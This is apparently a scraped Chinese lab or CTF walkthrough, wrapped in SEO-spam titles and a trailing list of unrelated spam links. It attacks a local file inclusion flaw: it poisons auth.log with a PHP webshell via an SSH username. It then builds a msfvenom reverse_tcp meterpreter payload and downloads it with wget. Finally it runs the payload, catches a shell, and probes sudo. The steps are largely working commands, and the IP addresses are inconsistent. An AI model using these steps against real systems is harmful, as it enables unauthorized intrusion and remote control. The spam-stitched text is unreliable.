当前位置: 首页 > news >正文

动易网站建设什么是搜索引擎优化推广

动易网站建设,什么是搜索引擎优化推广,电影网站模板下载,重庆市城乡建设委员会门户网站主机发现 arp-scan -l 得到靶机ip 192.168.229.152 端口扫描 nmap -sV -A -T4 192.168.1.20 这段代码使用 nmap 命令来扫描目标主机 192.168.1.20,并执行以下操作:-sV:探测开放的端口,以确定服务/版本信息。-A:启…

主机发现

arp-scan -l

得到靶机ip

192.168.229.152

端口扫描

nmap -sV -A -T4 192.168.1.20
这段代码使用 nmap 命令来扫描目标主机 192.168.1.20,并执行以下操作:-sV:探测开放的端口,以确定服务/版本信息。-A:启用操作系统探测、版本探测、脚本扫描和跟踪路由。-T4:设置时间模板,用于平衡速度和准确性。当运行这段代码时,nmap 将扫描目标主机,并尝试确定开放的端口及其对应的服务和版本信息。它还会执行一些额外的操作,如操作系统探测和跟踪路由。输出结果将显示目标主机的详细信息,包括开放的端口、服务、版本等。

发现80和22端口是开放的,分别是ssh和http服务

服务网站

http://192.168.229.152/

存在本地文件包含,找到一个邮箱,可能有用

http://192.168.229.152/index.php?file=about.php

漏洞利用

下载 LFI-JHADDIX.txt(字典)

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

burpsuite抓包

发送intuder爆破

复制url访问页面

没什么有用的信息

http://192.168.229.152/index.php?file=%2fvar%2flog%2flastlog

没什么有用的信息

http://192.168.229.152/index.php?file=%2fvar%2frun%2futmp

此处存在url跳转注意一下

http://192.168.229.152/index.php?file=%2fvar%2flog%2fauth%2elog

下面包含其他文件的结果

http://192.168.229.152/index.php?file=/etc/passwd

查看history

curl -is 192.168.229.152/index.php?file=/var/log/auth.og

之后的步骤建议在此处打快照

ssh @root192.168.229.152

此处输错密码会有错误日志存储,所以可以尝试注入

注入后发现用户名被隐藏

ssh '<?php system($_GET[cmd]);?>'@192.168.229.152

msf监听

写入一句话木马

curl -is 'http://192.168.229.152/index.php?file=/var/log/auth.log&cmd=ls'

msf生成木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.229.141 LPORT

将生成的木马放入本机免杀盘,在文件处开启http服务

python -m http.server

通过浏览器上传一句话木马

http://192.168.229.152/index.php?file=var/log/auth.log&d1no=system(%27wget+192.168.110.17:7878/shell.elf%27)%3b
http://192.168.229.152/index.php?file=/var/log/auth.log&d1no=system(%27chmod+%2bx+shell.elf%27)%3b
?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

kali开启监听

msfconsole
use exploit/multi/handler 
set payload linux/x86/meterpreter/reverse_tcp
set lport 5757
set lhost 192.168.229.141
run

监听成功

进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看免密操作

sudo -l
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

http://www.yidumall.com/news/92170.html

相关文章:

  • wordpress网站基础知识站长推荐黄色
  • 创建一个网站需要做哪些准备附子seo教程
  • 福州网站建设公司2023广州疫情最新消息今天
  • 网投网站怎么做重庆seo海洋qq
  • php与动态网站建设搜索引擎营销题库和答案
  • 南通市建设局网站马建明长沙seo代理
  • 青岛市专业做网站的吗qq引流推广平台
  • 网络制作软件广州seo服务
  • 如何把自己做的网站放到www注册公司网上申请入口
  • 贵阳网站建设哪家好方舟网页设计教程
  • 电商门户网站建设方案开发一个网站需要多少钱
  • 网络规划设计师是职业资格吗英文外链seo兼职
  • 怎么看网站有没有做百度推广百家号排名
  • 网站推广排名收费百度下载安装免费
  • 商城网站开发需要哪些人员合肥seo
  • 湖北网站建设公司排名网站注册查询
  • 微站网站百度指数搜索榜度指数
  • 手机网站推荐导航页中国工商业联合会
  • 做网站的法律seo报名在线咨询
  • 万网建网站教程营销型网站建设多少钱
  • 阿里云云服务器ecs做网站访问慢怎么给自己的公司做网站
  • 网站开发与维护专员岗位职责seo公司怎么推广宣传
  • 无锡网站建设设计公司友链外链app
  • 做哪种网站流量上的快深圳市文化广电旅游体育局
  • 网站建设中upl连接中文搜索引擎大全
  • 天津做网站费用18种最有效推广的方式
  • 如何用两台电脑做服务器建网站长沙网络推广营销
  • 各种网站推广是怎么做的最近一周热点新闻
  • 新都有没有做网站的网络营销课程个人感悟
  • 做动漫网站的心得体会网站建设方案模板